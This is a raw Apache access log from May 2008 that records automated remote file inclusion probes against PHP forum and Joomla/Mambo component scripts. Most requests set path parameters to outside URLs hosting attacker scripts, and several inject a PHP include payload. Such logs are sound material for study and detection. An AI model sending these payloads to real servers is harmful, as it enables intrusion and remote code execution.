210.59.227.15 - - [28/May/2008:11:47:20 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&p=833//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://geocities.com/machinekill/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.59.227.15 - - [28/May/2008:11:47:23 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&p=833//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://geocities.com/machinekill/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.59.227.15 - - [28/May/2008:11:47:26 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&p=833//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://geocities.com/machinekill/safe.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
210.59.227.15 - - [28/May/2008:11:47:26 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&p=833//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://geocities.com/machinekill/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:11:47:28 -0700] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:48:12 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:48:12 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:48:14 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.6.155.217 - - [28/May/2008:11:48:20 -0700] "GET /logs/access_080207.log/config.php?path_to_root=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.6.155.217 - - [28/May/2008:11:48:20 -0700] "GET /config.php?path_to_root=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.6.155.217 - - [28/May/2008:11:48:20 -0700] "GET /logs/config.php?path_to_root=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.6.155.217 - - [28/May/2008:11:48:22 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:48:35 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:48:41 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:48:42 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:49:00 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.48.105.13 - - [28/May/2008:11:49:34 -0700] "GET /logs/access_080220.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.48.105.13 - - [28/May/2008:11:49:34 -0700] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.48.105.13 - - [28/May/2008:11:49:34 -0700] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.48.105.13 - - [28/May/2008:11:49:37 -0700] "GET /logs/access_080312.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:11:50:32 -0700] "GET /logs/access_080117.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.96.205 - - [28/May/2008:11:51:22 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://learn.nazdeb.com/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:11:51:25 -0700] "GET /logs//components/com_smf/smf.php=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:11:51:26 -0700] "GET //components/com_smf/smf.php=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.254.129.70 - - [28/May/2008:11:51:36 -0700] "GET /logs/enc/content.php?Home_Path=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
121.254.129.70 - - [28/May/2008:11:51:36 -0700] "GET /enc/content.php?Home_Path=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:51:56 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:11:52:41 -0700] "GET /logs/access_080310.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:11:52:42 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:11:52:43 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.217.194 - - [28/May/2008:11:52:48 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:52:55 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:52:56 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.133.173 - - [28/May/2008:11:53:03 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bfdg.net/go/router/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [28/May/2008:11:53:03 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bfdg.net/go/router/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [28/May/2008:11:53:03 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bfdg.net/go/router/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:53:16 -0700] "GET /logs/access_080301.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:53:17 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:53:17 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:53:28 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:53:36 -0700] "GET //modules/vwar/admin/administrator/components/com_chronocontact/excelwriter/Writer/Format.php=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:53:36 -0700] "GET /logs//modules/vwar/admin/administrator/components/com_chronocontact/excelwriter/Writer/Format.php=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
202.179.0.195 - - [28/May/2008:11:53:40 -0700] "GET /logs/access_080320.log/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [28/May/2008:11:53:40 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [28/May/2008:11:53:40 -0700] "GET /logs/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:11:53:42 -0700] "GET /logs/access_080107.log/index2.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:11:53:42 -0700] "GET /index2.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:11:53:43 -0700] "GET /logs/index2.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:53:49 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.23.35 - - [28/May/2008:11:53:53 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:53:53 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.51.164 - - [28/May/2008:11:53:54 -0700] "GET /logs/access_080123.log HTTP/1.0" 200 638144 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:11:54:09 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:11:54:10 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:11:54:11 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:11:54:12 -0700] "GET /logs/access_080303.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.51.39.110 - - [28/May/2008:11:54:14 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bfdg.net/go/router/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
72.51.39.110 - - [28/May/2008:11:54:14 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bfdg.net/go/router/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
70.168.36.247 - - [28/May/2008:11:54:30 -0700] "GET /logs/access_080103.log//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.36.247 - - [28/May/2008:11:54:30 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.36.247 - - [28/May/2008:11:54:30 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:11:55:07 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:55:20 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:55:20 -0700] "GET /modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:55:20 -0700] "GET /logs/modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:55:20 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:55:20 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:55:21 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:55:21 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:55:56 -0700] "GET //common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:56:10 -0700] "GET /logs/access_080327.log//iniwiki/go/Show/TheHome&prev=...admin/spaw/modules/PNphpBB2/modules/PNphpBB2/includes/functions_admin.php=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:56:15 -0700] "GET //common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:56:17 -0700] "GET //common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:56:18 -0700] "GET //common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:56:18 -0700] "GET //common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.19.176.172 - - [28/May/2008:11:56:32 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:56:34 -0700] "GET /logs/access_080301.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:56:35 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
84.19.176.172 - - [28/May/2008:11:56:35 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:56:35 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.225.217.194 - - [28/May/2008:11:57:08 -0700] "GET /logs/access_080228.log/components/com_simpleboard/image_upload.php?sbp=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.217.194 - - [28/May/2008:11:57:08 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:57:17 -0700] "GET /logs/access_080301.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:57:17 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:57:17 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.198.106.61 - - [28/May/2008:11:57:18 -0700] "GET /logs/access_080208.log//modules/xfsection/modify.php?dir_module=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [28/May/2008:11:57:18 -0700] "GET //modules/xfsection/modify.php?dir_module=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [28/May/2008:11:57:19 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [28/May/2008:11:57:24 -0700] "GET /logs/access_080112.log//modules/xfsection/modify.php?dir_module=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.154.69 - - [28/May/2008:11:57:25 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.154.69 - - [28/May/2008:11:57:25 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.154.69 - - [28/May/2008:11:57:26 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.154.69 - - [28/May/2008:11:57:31 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:57:33 -0700] "GET /logs/access_080301.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:57:33 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:57:33 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [28/May/2008:11:57:39 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [28/May/2008:11:57:39 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.217.194 - - [28/May/2008:11:57:42 -0700] "GET /logs/access_071229.log/components/com_simpleboard/image_upload.php?sbp=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:57:45 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.59.130 - - [28/May/2008:11:57:45 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.59.130 - - [28/May/2008:11:57:45 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.59.130 - - [28/May/2008:11:57:46 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:11:57:48 -0700] "GET /logs/access_080112.log//modules/xfsection/modify.php?dir_module=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:11:57:48 -0700] "GET //modules/xfsection/modify.php?dir_module=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:11:57:49 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.59.130 - - [28/May/2008:11:57:54 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.59.130 - - [28/May/2008:11:57:55 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.59.130 - - [28/May/2008:11:57:55 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
